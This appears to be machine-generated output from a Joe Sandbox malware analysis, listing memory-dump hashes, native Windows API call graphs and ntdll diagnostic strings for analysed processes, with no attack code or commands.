                                          • Snapshot File: hcaresult_8_2_7ffb4a0a0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d83afc4fbf2f4f0434c36b64053940aeaba9436ed2be39728059340a1d3c87c0
                                          • Instruction ID: f63192caa5ff8ed0697b81f981ad2c0b684c257901e9c18e7f2d54b71bf69344
                                          • Opcode Fuzzy Hash: d83afc4fbf2f4f0434c36b64053940aeaba9436ed2be39728059340a1d3c87c0
                                          • Instruction Fuzzy Hash: B9612992B1EE870FF7A6BE7889511B566C5EFA9710B6801FEC44DCB2E3DD1898058341
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1764665478.00007FFB4A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A0A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_7ffb4a0a0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 05cba7628ede1695949ce45be67327e3f75d956e6921b7e45abfc6ab3b667701
                                          • Instruction ID: 3bdf39af9ff1f713647a31ef16313feeb91f4b0122995fbbe2a729c095a4fe3b
                                          • Opcode Fuzzy Hash: 05cba7628ede1695949ce45be67327e3f75d956e6921b7e45abfc6ab3b667701
                                          • Instruction Fuzzy Hash: 05513AA2B2DB474FE7A9AE2CD85117477C2DFA8210B7401BED44DCB6E3DD15E8064381
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1764665478.00007FFB4A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A0A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_7ffb4a0a0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4d2b9f0ce45600de01f97ffb2aa7ede8eb9c208802e9eeea73ad1a989c40ed57
                                          • Instruction ID: afc5c50db636007253abcc67d7c0dbdffca147439bf70d6d5951b369cb0e6d03
                                          • Opcode Fuzzy Hash: 4d2b9f0ce45600de01f97ffb2aa7ede8eb9c208802e9eeea73ad1a989c40ed57
                                          • Instruction Fuzzy Hash: 634126D2B1EA870FF3B6BE7889611746AC5EFB9710B6801FAD44DCB2E3DC1898454341
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1764665478.00007FFB4A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A0A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_7ffb4a0a0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 00c5e2166fda08ab0511657ccfe49342b8e7e9cadd09be3d9fdbe8f0449cf821
                                          • Instruction ID: 2349fbc873dfdc718d725d53274565d30d017f77452dabdcac3f14faf34bc0a7
                                          • Opcode Fuzzy Hash: 00c5e2166fda08ab0511657ccfe49342b8e7e9cadd09be3d9fdbe8f0449cf821
                                          • Instruction Fuzzy Hash: 1E2125D3F2EB470BE2B5AE28A94217016C6DFA8650B7801B9D44DCA7E7EC19AC024385
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1763971632.00007FFB49FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB49FD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_7ffb49fd0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d058c591037dde2cf792df2f86c3576dfc76c2a59630fff08f3f238660b4ad0b
                                          • Instruction ID: 31de466af17cd44d0912c345380a039a458c8a762d7c10e14d53786f1951ccf1
                                          • Opcode Fuzzy Hash: d058c591037dde2cf792df2f86c3576dfc76c2a59630fff08f3f238660b4ad0b
                                          • Instruction Fuzzy Hash: B8219070A1C64A8BEB0DAF58CD512F873A5EF85B04F104279D98BD72D5DA29B9028781
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1763971632.00007FFB49FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB49FD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_7ffb49fd0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 40f4a97f142c92ebf164cf47132b12179f0f84e00877fd647893e6bbe29a2eed
                                          • Instruction ID: 2aae3f05ffda516028781c8059169458bf399faef6592686aa199e8e67daf8f0
                                          • Opcode Fuzzy Hash: 40f4a97f142c92ebf164cf47132b12179f0f84e00877fd647893e6bbe29a2eed
                                          • Instruction Fuzzy Hash: 8101447111CB094FD744EF0CE451AA5B7E0FB99364F10056DE58AC36A1DB26E892CB45
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1763971632.00007FFB49FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB49FD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_7ffb49fd0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bf3f221af643d6bd75e2dd021ce38d37081362a84e1eb66b9c0fa86279250b96
                                          • Instruction ID: aaff8c4dd969b46e076b12904704a93b08f9848597a21d82b6dc121feb842b9c
                                          • Opcode Fuzzy Hash: bf3f221af643d6bd75e2dd021ce38d37081362a84e1eb66b9c0fa86279250b96
                                          • Instruction Fuzzy Hash: 2301717091C58A8BEB59AE28C9407B833A1EF49704F540279D44FD76D1CB297D41C745
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1764665478.00007FFB4A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A0A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_7ffb4a0a0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5bf9a13872c567324fe29e790041a1cdb3754165a210027ca0f96f6488393d0a
                                          • Instruction ID: 286877637dd2fdd5618a4704ac606a7e8e5fc7831f34b7cc883ef173991ddc4a
                                          • Opcode Fuzzy Hash: 5bf9a13872c567324fe29e790041a1cdb3754165a210027ca0f96f6488393d0a
                                          • Instruction Fuzzy Hash: B5F024A3F0DA6A0BEBA5AD6CB4172F86B85CF96120B2802F6C85EC364ADC044C1103C2
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1763971632.00007FFB49FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB49FD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_7ffb49fd0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: dc29dc50cdbd2ed51b540ece48c1154d9108fa01c933e8b0df10b2acc34bc5e1
                                          • Instruction ID: efc4f185703cca51c9fa68fbea92cefd174c84a4ce02253414f47a4cabb81e67
                                          • Opcode Fuzzy Hash: dc29dc50cdbd2ed51b540ece48c1154d9108fa01c933e8b0df10b2acc34bc5e1
                                          • Instruction Fuzzy Hash: 58F0A46071CA854FE349AF3CC41156877D1EF99740B5006BAE88ACB3E3EE24E9458655
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1763971632.00007FFB49FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB49FD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_7ffb49fd0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 17ffeceaf1a8c0699484ab9339f660cb2425ff2b084578cd85a06cc51e25d17b
                                          • Instruction ID: 311e19a7a2f13365ed50d7a034c3fe458de6af7c1f9491e2e11c3b3a47210a1f
                                          • Opcode Fuzzy Hash: 17ffeceaf1a8c0699484ab9339f660cb2425ff2b084578cd85a06cc51e25d17b
                                          • Instruction Fuzzy Hash: EBF0FED1B2C94B0FEB88BE7C851627C72D2DBD8711B500278E40FC62C7DD18B8464645
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1763971632.00007FFB49FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB49FD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_7ffb49fd0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d689ae60ef4a0bb2d301fb246ac73cb7afad7c6ce8b510b29ff5e760e46e8b14
                                          • Instruction ID: b1e70373e590d43f29b1e4c1f05b99036c1525e0de3946979a3e4a069a4e50a7
                                          • Opcode Fuzzy Hash: d689ae60ef4a0bb2d301fb246ac73cb7afad7c6ce8b510b29ff5e760e46e8b14
                                          • Instruction Fuzzy Hash: 53F0F070A1C5868BEB5AEF28CE507B833A1EF8A700F5002B9D44FCB2D2DE287941C741
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1763971632.00007FFB49FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB49FD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_7ffb49fd0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 38f2ce73082a273fbeca46643c8cd98ad6069a3abf3234429ebb938b8a9e7365
                                          • Instruction ID: d64b78605859ae4a8deb2950da50eafa009c556488ae9c304e1ee51b87ab1566
                                          • Opcode Fuzzy Hash: 38f2ce73082a273fbeca46643c8cd98ad6069a3abf3234429ebb938b8a9e7365
                                          • Instruction Fuzzy Hash: AB9192D3D0EBD75BE3166E3DA9B90957F90DF52A5471E01FBC8C54F0D3A808680A82A2
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1763971632.00007FFB49FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB49FD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_7ffb49fd0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 49fe162881d9cfee70fdf7ba5627dc70578ed1fd1589672231a8c80e58cd1ca1
                                          • Instruction ID: 36cb690493f22e343a787995f6967517f0794442a992142cb5acc147109b78bc
                                          • Opcode Fuzzy Hash: 49fe162881d9cfee70fdf7ba5627dc70578ed1fd1589672231a8c80e58cd1ca1
                                          • Instruction Fuzzy Hash: EF818ED3E0EBD74BE3176E3DA9B90956F50DF52A5475E05FBC8C54B0D3A808680B82A2

                                          Execution Graph

                                          Execution Coverage:1%
                                          Dynamic/Decrypted Code Coverage:5.9%
                                          Signature Coverage:9.2%
                                          Total number of Nodes:119
                                          Total number of Limit Nodes:11
                                          execution_graph 77537 42be43 77538 42be60 77537->77538 77541 3442df0 LdrInitializeThunk 77538->77541 77539 42be88 77541->77539 77542 42faa3 77543 42fab3 77542->77543 77544 42fab9 77542->77544 77547 42e9c3 77544->77547 77546 42fadf 77550 42cb63 77547->77550 77549 42e9de 77549->77546 77551 42cb7d 77550->77551 77552 42cb8e RtlAllocateHeap 77551->77552 77552->77549 77568 42fbd3 77569 42fb43 77568->77569 77570 42fba0 77569->77570 77571 42e9c3 RtlAllocateHeap 77569->77571 77572 42fb7d 77571->77572 77574 42e8e3 77572->77574 77577 42cbb3 77574->77577 77576 42e8fc 77576->77570 77578 42cbcd 77577->77578 77579 42cbde RtlFreeHeap 77578->77579 77579->77576 77580 428e73 77582 428ed8 77580->77582 77581 428f0f 77582->77581 77585 424653 77582->77585 77584 428ef1 77586 424681 77585->77586 77587 4247e3 77586->77587 77588 4247f8 77586->77588 77590 42c853 NtClose 77587->77590 77596 42c853 77588->77596 77591 4247ec 77590->77591 77591->77584 77592 424838 77592->77584 77593 424801 77593->77592 77594 42e8e3 RtlFreeHeap 77593->77594 77595 42482c 77594->77595 77595->77584 77597 42c86d 77596->77597 77598 42c87e NtClose 77597->77598 77598->77593 77599 424c13 77600 424c2f 77599->77600 77601 424c57 77600->77601 77602 424c6b 77600->77602 77603 42c853 NtClose 77601->77603 77604 42c853 NtClose 77602->77604 77606 424c60 77603->77606 77605 424c74 77604->77605 77609 42ea03 RtlAllocateHeap 77605->77609 77608 424c7f 77609->77608 77610 424fb3 77611 424fcc 77610->77611 77612 425014 77611->77612 77615 425054 77611->77615 77617 425059 77611->77617 77613 42e8e3 RtlFreeHeap 77612->77613 77614 425024 77613->77614 77616 42e8e3 RtlFreeHeap 77615->77616 77616->77617 77553 413e83 77556 413ea3 77553->77556 77555 413f0c 77556->77555 77558 41b643 RtlFreeHeap LdrInitializeThunk 77556->77558 77557 413f02 77558->77557 77559 413ca3 77562 42cac3 77559->77562 77563 42cadd 77562->77563 77566 3442c70 LdrInitializeThunk 77563->77566 77564 413cc5 77566->77564 77618 4179b3 77619 4179d7 77618->77619 77620 417a13 LdrLoadDll 77619->77620 77621 4179de 77619->77621 77620->77621 77567 3442b60 LdrInitializeThunk 77622 401bb9 77623 401bde 77622->77623 77626 42ff73 77623->77626 77629 42e493 77626->77629 77630 42e4b9 77629->77630 77639 407763 77630->77639 77632 42e4cf 77638 401cdb 77632->77638 77642 41b333 77632->77642 77634 42e4ee 77635 42e503 77634->77635 77636 42cc03 ExitProcess 77634->77636 77653 42cc03 77635->77653 77636->77635 77641 407770 77639->77641 77656 416673 77639->77656 77641->77632 77643 41b35f 77642->77643 77674 41b223 77643->77674 77646 41b3a4 77647 41b3c0 77646->77647 77651 42c853 NtClose 77646->77651 77647->77634 77648 41b38c 77649 41b397 77648->77649 77650 42c853 NtClose 77648->77650 77649->77634 77650->77649 77652 41b3b6 77651->77652 77652->77634 77654 42cc1d 77653->77654 77655 42cc2e ExitProcess 77654->77655 77655->77638 77657 41668d 77656->77657 77659 4166a6 77657->77659 77660 42d283 77657->77660 77659->77641 77662 42d29d 77660->77662 77661 42d2cc 77661->77659 77662->77661 77667 42be93 77662->77667 77665 42e8e3 RtlFreeHeap 77666 42d342 77665->77666 77666->77659 77668 42beb0 77667->77668 77671 3442c0a 77668->77671 77669 42bedc 77669->77665 77672 3442c1f LdrInitializeThunk 77671->77672 77673 3442c11 77671->77673 77672->77669 77673->77669 77675 41b319 77674->77675 77676 41b23d 77674->77676 77675->77646 77675->77648 77680 42bf33 77676->77680 77679 42c853 NtClose 77679->77675 77681 42bf4d 77680->77681 77684 34435c0 LdrInitializeThunk 77681->77684 77682 41b30d 77682->77679 77684->77682

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 16 4179b3-4179cf 17 4179d7-4179dc 16->17 18 4179d2 call 42f5e3 16->18 19 4179e2-4179f0 call 42fbe3 17->19 20 4179de-4179e1 17->20 18->17 23 417a00-417a11 call 42df63 19->23 24 4179f2-4179fd call 42fe83 19->24 29 417a13-417a27 LdrLoadDll 23->29 30 417a2a-417a2d 23->30 24->23 29->30
                                          APIs
                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417A25
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841391892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_400000_appidtel.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Load
                                          • String ID:
                                          • API String ID: 2234796835-0
                                          • Opcode ID: c79fabb3fdf5941d6f1bcb5b27b0803dcfdb01cfacf757276fc861b6e6210bf1
                                          • Instruction ID: 1d8b1bd401b4a974e2d530f46a5ed2bb40f625d7e10e6af9b4b37b09ca64a5ce
                                          • Opcode Fuzzy Hash: c79fabb3fdf5941d6f1bcb5b27b0803dcfdb01cfacf757276fc861b6e6210bf1
                                          • Instruction Fuzzy Hash: 81015EB1E0020DABDF10DBA1DC42FDEB7B8AB14308F4041AAE90897241F634EB48CB95

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 41 42c853-42c88c call 404a33 call 42da53 NtClose
                                          APIs
                                          • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C887
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841391892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_400000_appidtel.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          • Opcode ID: defa71bd3f3c186be473eb528606ffda59fc89332a1af15f46d98703a3a384b4
                                          • Instruction ID: 3a881cc0fb228ea29f5e86185c220ed7150fb12850acc700e840458ec2c0ccab
                                          • Opcode Fuzzy Hash: defa71bd3f3c186be473eb528606ffda59fc89332a1af15f46d98703a3a384b4
                                          • Instruction Fuzzy Hash: 13E04F356146147BD610FA5ADC01F9BB75DDFC5754F004419FA08A7142C7B0790087E4

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 58 34435c0-34435cc LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: db4f22ff9d64bbb87f13b92a5ef9410748566ae0d63caefe14c70d4e9852c1ab
                                          • Instruction ID: dffe0009a13109df3f385fb25bae79dc44f3e9d345da7cdc95528135d2b3f822
                                          • Opcode Fuzzy Hash: db4f22ff9d64bbb87f13b92a5ef9410748566ae0d63caefe14c70d4e9852c1ab
                                          • Instruction Fuzzy Hash: E7900231B0550802D100B15845147061005C7E0201F65C412B4424968E8B958E5169A6

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 55 3442b60-3442b6c LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: b653407c5e74aeb95aca243a2e8581849e46db1596c8a7fbe162f924500ef364
                                          • Instruction ID: 11ef8b9acc6d4724046d0bc45293269af8cabdbddba5f2dd758cf8b0e72c876a
                                          • Opcode Fuzzy Hash: b653407c5e74aeb95aca243a2e8581849e46db1596c8a7fbe162f924500ef364
                                          • Instruction Fuzzy Hash: 36900261702404034105B1584414616400AC7F0201B55C022F5014990ECB258D916529

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 57 3442df0-3442dfc LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 1557cff150bec14c2f618f7994b23af48452bf7d4316cb322c75c76e4d82e36e
                                          • Instruction ID: 84e9b48995999afed22fb2d264348a7299a6e3bc852c9b784bb06fe4f33abf34
                                          • Opcode Fuzzy Hash: 1557cff150bec14c2f618f7994b23af48452bf7d4316cb322c75c76e4d82e36e
                                          • Instruction Fuzzy Hash: 0F90023170140813D111B15845047070009C7E0241F95C413B4424958E9B568E52A525

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 56 3442c70-3442c7c LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 79705ed3677ec00387ba433266cf944c2e4b130f64e23cbbaad893d15d9dcc1b
                                          • Instruction ID: 3c4011afdb62b7eda09a23605465de4ff7934758b94483fbbe4c5d8437f6b0d8
                                          • Opcode Fuzzy Hash: 79705ed3677ec00387ba433266cf944c2e4b130f64e23cbbaad893d15d9dcc1b
                                          • Instruction Fuzzy Hash: 9C90023170148C02D110B158840474A0005C7E0301F59C412B8424A58E8B958D917525

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 31 42cb63-42cba4 call 404a33 call 42da53 RtlAllocateHeap
                                          APIs
                                          • RtlAllocateHeap.NTDLL(?,0041E7EE,?,?,00000000,?,0041E7EE,?,?,?), ref: 0042CB9F
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841391892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_400000_appidtel.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 5fd82a2e6d91b6cec14fc75788cc43cbe269f5e21262af31c31129c60037b8d8
                                          • Instruction ID: 82b2466ef0562ce1d16ca283f089c4b38458be5f07ec6e497c422c9c384ea1b9
                                          • Opcode Fuzzy Hash: 5fd82a2e6d91b6cec14fc75788cc43cbe269f5e21262af31c31129c60037b8d8
                                          • Instruction Fuzzy Hash: 05E092756042047BC610EE59DC41F9B77ACEFC4714F00401AFA08A7241D670BD10CBB8

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 36 42cbb3-42cbf4 call 404a33 call 42da53 RtlFreeHeap
                                          APIs
                                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,54535251,00000007,00000000,00000004,00000000,00417235,000000F4), ref: 0042CBEF
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841391892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_400000_appidtel.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: 99485564f50c3a34068a1f18d04ec4b318acdfca80f3bf1c92aff26f8c7cdf43
                                          • Instruction ID: 29b439f406028001340c1bd64e8c61233fbdaa16644e26758fc6275abb8ed0b6
                                          • Opcode Fuzzy Hash: 99485564f50c3a34068a1f18d04ec4b318acdfca80f3bf1c92aff26f8c7cdf43
                                          • Instruction Fuzzy Hash: 8EE092B5604204BBDA14EE59DC41FDB77ACEFC8714F004019F908A7242D670BD11CBB8

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 46 42cc03-42cc3c call 404a33 call 42da53 ExitProcess
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841391892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_400000_appidtel.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID:
                                          • API String ID: 621844428-0
                                          • Opcode ID: 6e12507170859c0696d3e608acc9f0316fbc330ddca1620dece7a8f1f90263dc
                                          • Instruction ID: 8f84f505285f56747dcf92bf71691f038258456dfa7d30835ecae4a138d95e77
                                          • Opcode Fuzzy Hash: 6e12507170859c0696d3e608acc9f0316fbc330ddca1620dece7a8f1f90263dc
                                          • Instruction Fuzzy Hash: 56E046326042147BC620EAAADC01F9BB76CDFC5764F40801AFA1CA7241DAB6BA0187A4

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 51 3442c0a-3442c0f 52 3442c11-3442c18 51->52 53 3442c1f-3442c26 LdrInitializeThunk 51->53
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: bd30e0ebcbe16f56d676fc1d93e18c18272eba012334db531ba51687ab1f73fa
                                          • Instruction ID: 79ec27378a6037507ec94bca564769a146f6e3dd68bf7a42335bf3f26fbf587e
                                          • Opcode Fuzzy Hash: bd30e0ebcbe16f56d676fc1d93e18c18272eba012334db531ba51687ab1f73fa
                                          • Instruction Fuzzy Hash: 7CB09B71D015C5C5EA11E76046087177904A7D0701F19C473F3030A51F4779C5D1E579
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-2160512332
                                          • Opcode ID: cb8a22ba1e6f5cd3c50a94c9bbb50907c0dc2fb9c12137191f585a7d349f5459
                                          • Instruction ID: 22005c848ec19d8159e15d1117d4e6c712c03049c1991321ede6659aff12e020
                                          • Opcode Fuzzy Hash: cb8a22ba1e6f5cd3c50a94c9bbb50907c0dc2fb9c12137191f585a7d349f5459
                                          • Instruction Fuzzy Hash: 6C924A79604741AFE720EF15C880B6BB7E8BB84714F084D2EFA959F250D7B0E845CB5A
                                          Strings
                                          • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0347540A, 03475496, 03475519
                                          • undeleted critical section in freed memory, xrefs: 0347542B
                                          • Critical section debug info address, xrefs: 0347541F, 0347552E
                                          • 8, xrefs: 034752E3
                                          • Thread identifier, xrefs: 0347553A
                                          • Invalid debug info address of this critical section, xrefs: 034754B6
                                          • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 034754E2
                                          • corrupted critical section, xrefs: 034754C2
                                          • Critical section address, xrefs: 03475425, 034754BC, 03475534
                                          • Address of the debug info found in the active list., xrefs: 034754AE, 034754FA
                                          • Thread is in a state in which it cannot own a critical section, xrefs: 03475543
                                          • double initialized or corrupted critical section, xrefs: 03475508
                                          • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 034754CE
                                          • Critical section address., xrefs: 03475502
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                          • API String ID: 0-2368682639
                                          • Opcode ID: 8aaf5a219e33e8ad3871e54517bc0db42ccd270b8f4befe9f1d26543494725f2
                                          • Instruction ID: 81d870691c4a34f5e283cc726ae9b09bab25cba7332a6da8cc39d055411634ab
                                          • Opcode Fuzzy Hash: 8aaf5a219e33e8ad3871e54517bc0db42ccd270b8f4befe9f1d26543494725f2
                                          • Instruction Fuzzy Hash: 4781AC75E40368AFDB60CF95C880BAEBBB9EB09B04F14415AF518BF281C375A941CB64
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                          • API String ID: 0-3591852110
                                          • Opcode ID: 950995f0e20f47d956ded32ef084c7a0cdb642df269c474cc436a6f4c08eaf2b
                                          • Instruction ID: 9c39dd5b99d9e86f28a307dd56f5a196f4a933f0713ecdbb91dddc6bb78ef298
